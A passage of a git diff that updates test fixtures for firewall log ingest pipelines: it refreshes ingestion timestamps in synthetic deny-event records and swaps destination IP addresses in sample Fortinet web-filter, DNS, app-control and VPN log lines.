src_port=1 dst_port=5516 server_app=emp pid=2861 app_name=luptas traff_direct=outbound block_count=1444 logon_user=oinv@inculp2078.host msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875552Z" + "ingested": "2021-12-09T13:37:20.234371400Z" }, "tags": [ "preserve_original_event" @@ -822,7 +822,7 @@ }, "message": "September 27 05:04:49 temse6953.www.example proto=ipv6-icmp service=https status=deny src=10.149.193.117 dst=10.28.124.236 src_port=5343 dst_port=3434 server_app=atcupi pid=3559 app_name=edquia traff_direct=internal block_count=3176 logon_user=mullam@mexerc2757.internal.home msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875556600Z" + "ingested": "2021-12-09T13:37:20.234377800Z" }, "tags": [ "preserve_original_event" @@ -834,7 +834,7 @@ }, "message": "October 11 12:07:23 deriti6952.mail.domain proto=ipv6-icmp service=http status=deny src=10.34.131.224 dst=10.196.96.162 src_port=649 dst_port=6378 server_app=equatDu pid=1710 app_name=aconse traff_direct=outbound block_count=7174 logon_user=tnonproi@squira4455.api.domain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875562600Z" + "ingested": "2021-12-09T13:37:20.234384200Z" }, "tags": [ "preserve_original_event" @@ -846,7 +846,7 @@ }, "message": "October 25 19:09:57 abor1370.www.domain proto=ipv6-icmp service=https status=deny src=10.97.236.123 dst=10.77.78.180 src_port=5159 dst_port=5380 server_app=reetdol pid=4984 app_name=ugi traff_direct=inbound block_count=4782 logon_user=nisi@emveleum3661.localhost msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875568800Z" + "ingested": "2021-12-09T13:37:20.234388800Z" }, "tags": [ "preserve_original_event" @@ -858,7 +858,7 @@ }, "message": "November 9 02:12:32 emullamc5418.mail.test proto=ipv6 service=ms-wbt-server status=deny src=10.82.133.66 dst=10.45.54.107 src_port=7229 dst_port=3593 server_app=nse pid=3421 app_name=quira traff_direct=unknown block_count=5362 logon_user=olorem@sedquiac6517.internal.localhost msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875573200Z" + "ingested": "2021-12-09T13:37:20.234393800Z" }, "tags": [ "preserve_original_event" @@ -870,7 +870,7 @@ }, "message": "November 23 09:15:06 squirati7050.www5.lan proto=rdp service=pop3 status=deny src=10.180.180.230 dst=10.170.252.219 src_port=4147 dst_port=2454 server_app=tesseci pid=4020 app_name=radipis traff_direct=external block_count=7020 logon_user=nse@veniam3148.www5.home msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875578Z" + "ingested": "2021-12-09T13:37:20.234400200Z" }, "tags": [ "preserve_original_event" @@ -882,7 +882,7 @@ }, "message": "December 7 16:17:40 venia2079.mail.example proto=rdp service=http status=deny src=10.5.11.205 dst=10.65.144.51 src_port=4901 dst_port=2283 server_app=lumqu pid=617 app_name=autf traff_direct=outbound block_count=5050 logon_user=uptat@unt3559.www.home msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875582700Z" + "ingested": "2021-12-09T13:37:20.234405800Z" }, "tags": [ "preserve_original_event" @@ -894,7 +894,7 @@ }, "message": "December 21 23:20:14 snostrum3450.www5.localhost proto=udp service=smtp status=deny src=10.195.223.82 dst=10.76.122.196 src_port=3128 dst_port=5325 server_app=atu pid=487 app_name=iame traff_direct=external block_count=593 logon_user=umiurer@rere5274.mail.domain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875587200Z" + "ingested": "2021-12-09T13:37:20.234420500Z" }, "tags": [ "preserve_original_event" @@ -906,7 +906,7 @@ }, "message": "January 5 06:22:49 gelitsed3249.corp proto=icmp service=ms-wbt-server status=deny src=10.138.210.116 dst=10.225.255.211 src_port=5595 dst_port=3369 server_app=rum pid=2442 app_name=eursinto traff_direct=external block_count=956 logon_user=fugiatn@uaeabi3728.www5.invalid msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875591200Z" + "ingested": "2021-12-09T13:37:20.234427400Z" }, "tags": [ "preserve_original_event" @@ -918,7 +918,7 @@ }, "message": "January 19 13:25:23 dolor7082.internal.localhost proto=icmp service=smtp status=deny src=10.250.81.189 dst=10.219.1.151 src_port=5404 dst_port=4323 server_app=redo pid=6311 app_name=ditautf traff_direct=external block_count=3262 logon_user=ori@uamqu2804.test msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875597500Z" + "ingested": "2021-12-09T13:37:20.234433200Z" }, "tags": [ "preserve_original_event" @@ -930,7 +930,7 @@ }, "message": "February 2 20:27:57 totam6886.api.localhost proto=ggp service=https status=deny src=10.54.23.133 dst=10.76.125.70 src_port=3258 dst_port=756 server_app=oluptat pid=7128 app_name=eseruntm traff_direct=internal block_count=1916 logon_user=oloreeu@olor5201.host msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875606600Z" + "ingested": "2021-12-09T13:37:20.234438500Z" }, "tags": [ "preserve_original_event" @@ -942,7 +942,7 @@ }, "message": "February 17 03:30:32 laborum5749.www.example proto=igmp service=http status=deny src=10.36.110.69 dst=10.189.42.62 src_port=4187 dst_port=4262 server_app=duntut pid=2780 app_name=ullamc traff_direct=unknown block_count=170 logon_user=eque@eufug3348.www.lan msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875615200Z" + "ingested": "2021-12-09T13:37:20.234443400Z" }, "tags": [ "preserve_original_event" @@ -954,7 +954,7 @@ }, "message": "March 3 10:33:06 lup3313.api.home proto=tcp service=https status=deny src=10.47.179.68 dst=10.183.202.82 src_port=5107 dst_port=2208 server_app=usmod pid=3284 app_name=amni traff_direct=unknown block_count=2645 logon_user=umfugi@stquidol239.www5.invalid msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875623800Z" + "ingested": "2021-12-09T13:37:20.234455500Z" }, "tags": [ "preserve_original_event" @@ -966,7 +966,7 @@ }, "message": "March 17 17:35:40 edq5397.www.test proto=ipv6-icmp service=pop3 status=deny src=10.73.28.165 dst=10.221.206.74 src_port=3668 dst_port=1480 server_app=ihilmole pid=2314 app_name=litanim traff_direct=inbound block_count=5572 logon_user=quas@gia6531.mail.invalid msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875632200Z" + "ingested": "2021-12-09T13:37:20.234459700Z" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ }, "message": "April 1 00:38:14 udan6536.www5.test proto=ipv6 service=ms-wbt-server status=deny src=10.85.104.146 dst=10.14.204.36 src_port=3442 dst_port=4887 server_app=qua pid=5284 app_name=ents traff_direct=inbound block_count=973 logon_user=emp@lamcola4879.www5.localdomain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875640600Z" + "ingested": "2021-12-09T13:37:20.234464400Z" }, "tags": [ "preserve_original_event" @@ -990,7 +990,7 @@ }, "message": "April 15 07:40:49 rumet6923.www5.lan proto=rdp service=https status=deny src=10.208.18.210 dst=10.30.246.132 src_port=3601 dst_port=388 server_app=texplica pid=3990 app_name=ore traff_direct=outbound block_count=5624 logon_user=veniam@edquian330.mail.local msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875649100Z" + "ingested": "2021-12-09T13:37:20.234469600Z" }, "tags": [ "preserve_original_event" @@ -1002,7 +1002,7 @@ }, "message": "April 29 14:43:23 itse522.internal.localdomain proto=udp service=pop3 status=deny src=10.106.249.91 dst=10.19.119.17 src_port=1732 dst_port=3822 server_app=veleumi pid=4337 app_name=tvol traff_direct=unknown block_count=2783 logon_user=lit@santi837.api.domain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875657700Z" + "ingested": "2021-12-09T13:37:20.234475900Z" }, "tags": [ "preserve_original_event" @@ -1014,7 +1014,7 @@ }, "message": "May 13 21:45:57 amc3059.local proto=igmp service=http status=deny src=10.29.109.126 dst=10.181.41.154 src_port=6261 dst_port=866 server_app=itseddo pid=5275 app_name=seos traff_direct=unknown block_count=6721 logon_user=labo@lpaquiof804.internal.invalid msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875666100Z" + "ingested": "2021-12-09T13:37:20.234481100Z" }, "tags": [ "preserve_original_event" @@ -1026,7 +1026,7 @@ }, "message": "May 28 04:48:31 enbyCi3813.api.domain proto=ipv6-icmp service=https status=deny src=10.164.207.42 dst=10.164.120.197 src_port=1901 dst_port=2304 server_app=itametco pid=2286 app_name=remip traff_direct=external block_count=3116 logon_user=pta@nonn4478.host msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875674600Z" + "ingested": "2021-12-09T13:37:20.234486200Z" }, "tags": [ "preserve_original_event" @@ -1038,7 +1038,7 @@ }, "message": "June 11 11:51:06 liquipex1155.mail.corp proto=ipv6-icmp service=smtp status=deny src=10.183.189.133 dst=10.154.191.225 src_port=5347 dst_port=7856 server_app=Loremip pid=2990 app_name=tur traff_direct=unknown block_count=6105 logon_user=ita@amquaer3985.www5.example msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875683Z" + "ingested": "2021-12-09T13:37:20.234490600Z" }, "tags": [ "preserve_original_event" @@ -1050,7 +1050,7 @@ }, "message": "June 25 18:53:40 isn3991.local proto=igmp service=smtp status=deny src=10.29.120.226 dst=10.103.189.199 src_port=1296 dst_port=767 server_app=exerci pid=226 app_name=eserun traff_direct=outbound block_count=5452 logon_user=emu@orem6317.local msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875687400Z" + "ingested": "2021-12-09T13:37:20.234497Z" }, "tags": [ "preserve_original_event" @@ -1062,7 +1062,7 @@ }, "message": "July 10 01:56:14 iumtotam1010.www5.corp proto=icmp service=https status=deny src=10.133.254.23 dst=10.210.153.7 src_port=6251 dst_port=7030 server_app=nofdeFi pid=4691 app_name=sautei traff_direct=external block_count=2088 logon_user=voluptas@velill3230.www.corp msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875693500Z" + "ingested": "2021-12-09T13:37:20.234503200Z" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ }, "message": "July 24 08:58:48 onsecte91.www5.localdomain proto=tcp service=pop3 status=deny src=10.126.245.73 dst=10.91.2.135 src_port=180 dst_port=2141 server_app=ender pid=5647 app_name=rumSecti traff_direct=outbound block_count=4680 logon_user=olore@orumS757.www5.corp msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875699100Z" + "ingested": "2021-12-09T13:37:20.234508400Z" }, "tags": [ "preserve_original_event" @@ -1086,7 +1086,7 @@ }, "message": "August 7 16:01:23 abori7686.internal.host proto=rdp service=https status=deny src=10.183.243.246 dst=10.137.85.123 src_port=218 dst_port=7073 server_app=ntsunti pid=2313 app_name=magnam traff_direct=internal block_count=6402 logon_user=cid@emi4534.www.localdomain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875705600Z" + "ingested": "2021-12-09T13:37:20.234514600Z" }, "tags": [ "preserve_original_event" @@ -1098,7 +1098,7 @@ }, "message": "August 21 23:03:57 reprehen3513.test proto=ipv6 service=smtp status=deny src=10.61.225.196 dst=10.10.86.55 src_port=4720 dst_port=5132 server_app=isiu pid=1585 app_name=mmodi traff_direct=external block_count=3034 logon_user=eniamqu@inimav1576.mail.example msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875710Z" + "ingested": "2021-12-09T13:37:20.234520800Z" }, "tags": [ "preserve_original_event" @@ -1110,7 +1110,7 @@ }, "message": "September 5 06:06:31 orroquis284.api.domain proto=udp service=http status=deny src=10.125.143.153 dst=10.79.73.195 src_port=2657 dst_port=457 server_app=umf pid=3141 app_name=moll traff_direct=outbound block_count=7645 logon_user=emip@aturQu7083.mail.host msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875714700Z" + "ingested": "2021-12-09T13:37:20.234526900Z" }, "tags": [ "preserve_original_event" @@ -1122,7 +1122,7 @@ }, "message": "September 19 13:09:05 tionula2060.www5.localhost proto=ipv6 service=ms-wbt-server status=deny src=10.240.216.85 dst=10.64.139.17 src_port=2046 dst_port=2438 server_app=ice pid=6331 app_name=aal traff_direct=external block_count=4982 logon_user=nimadmin@lumqui7769.mail.local msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875718900Z" + "ingested": "2021-12-09T13:37:20.234533100Z" }, "tags": [ "preserve_original_event" @@ -1134,7 +1134,7 @@ }, "message": "October 3 20:11:40 rumSecti111.www5.domain proto=ipv6 service=ms-wbt-server status=deny src=10.87.90.49 dst=10.222.245.80 src_port=1486 dst_port=4017 server_app=itaedict pid=4474 app_name=byCic traff_direct=inbound block_count=3380 logon_user=ptatemse@siarc6339.internal.corp msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875723700Z" + "ingested": "2021-12-09T13:37:20.234539300Z" }, "tags": [ "preserve_original_event" @@ -1146,7 +1146,7 @@ }, "message": "October 18 03:14:14 olores7881.local proto=udp service=pop3 status=deny src=10.143.53.214 dst=10.87.144.208 src_port=3310 dst_port=2440 server_app=ipsumq pid=4855 app_name=psaquaea traff_direct=unknown block_count=5772 logon_user=psumq@ptatev6552.www.test msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875727700Z" + "ingested": "2021-12-09T13:37:20.234545400Z" }, "tags": [ "preserve_original_event" @@ -1158,7 +1158,7 @@ }, "message": "November 1 10:16:48 tDuis3281.www5.localdomain proto=ipv6-icmp service=pop3 status=deny src=10.204.178.19 dst=10.105.97.134 src_port=616 dst_port=1935 server_app=oremque pid=1729 app_name=inimve traff_direct=unknown block_count=6564 logon_user=mexercit@byC5766.internal.home msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875734600Z" + "ingested": "2021-12-09T13:37:20.234551700Z" }, "tags": [ "preserve_original_event" @@ -1170,7 +1170,7 @@ }, "message": "November 15 17:19:22 uptasnul2751.www5.corp proto=rdp service=smtp status=deny src=10.161.64.168 dst=10.194.67.223 src_port=7154 dst_port=5767 server_app=tatemse pid=4493 app_name=amqui traff_direct=inbound block_count=3673 logon_user=tion@hender6628.local msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875758900Z" + "ingested": "2021-12-09T13:37:20.234558Z" }, "tags": [ "preserve_original_event" @@ -1182,7 +1182,7 @@ }, "message": "November 30 00:21:57 upt6017.api.localdomain proto=tcp service=smtp status=deny src=10.100.154.220 dst=10.120.148.241 src_port=5535 dst_port=1655 server_app=eeufug pid=6094 app_name=modt traff_direct=external block_count=5150 logon_user=rsitam@xercit7649.www5.home msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875766600Z" + "ingested": "2021-12-09T13:37:20.234564100Z" }, "tags": [ "preserve_original_event" @@ -1194,7 +1194,7 @@ }, "message": "December 14 07:24:31 tpers2217.internal.lan proto=udp service=ms-wbt-server status=deny src=10.116.153.19 dst=10.180.90.112 src_port=6610 dst_port=1936 server_app=olu pid=5012 app_name=dexercit traff_direct=outbound block_count=2216 logon_user=itessequ@porissu1470.domain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875781100Z" + "ingested": "2021-12-09T13:37:20.234570600Z" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log index 4a6606ea21c..ee983a59106 100644 --- a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log +++ b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log @@ -1,35 +1,35 @@ -<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony" -<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=8.8.8.8 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high" -<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email" -<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" -<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" -<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" -<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8, 8.8.4.4" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" -<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" -<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access" -<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" -<189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=8.8.4.4 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert" +<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony" +<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=67.43.156.13 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high" +<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email" +<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" +<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" +<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" +<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13, 67.43.156.13" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" +<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" +<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access" +<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" +<189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=67.43.156.13 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert" <189>date=2020-04-23 time=12:32:48 devname="testswitch3" devid="someotherrouteridagain" logid="0102043014" type="event" subtype="user" level="notice" vd="root" eventtime=1587231168439640874 tz="-0500" logdesc="FSSO logon authentication status" srcip=10.10.10.10 user="elasticouser" server="elasticserver" action="FSSO-logon" msg="FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10" -<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=8.8.4.4 locip=8.8.8.8 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE" -<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.4.5.4 locip=9.9.9.9 remport=500 locport=500 outintf="wan1" 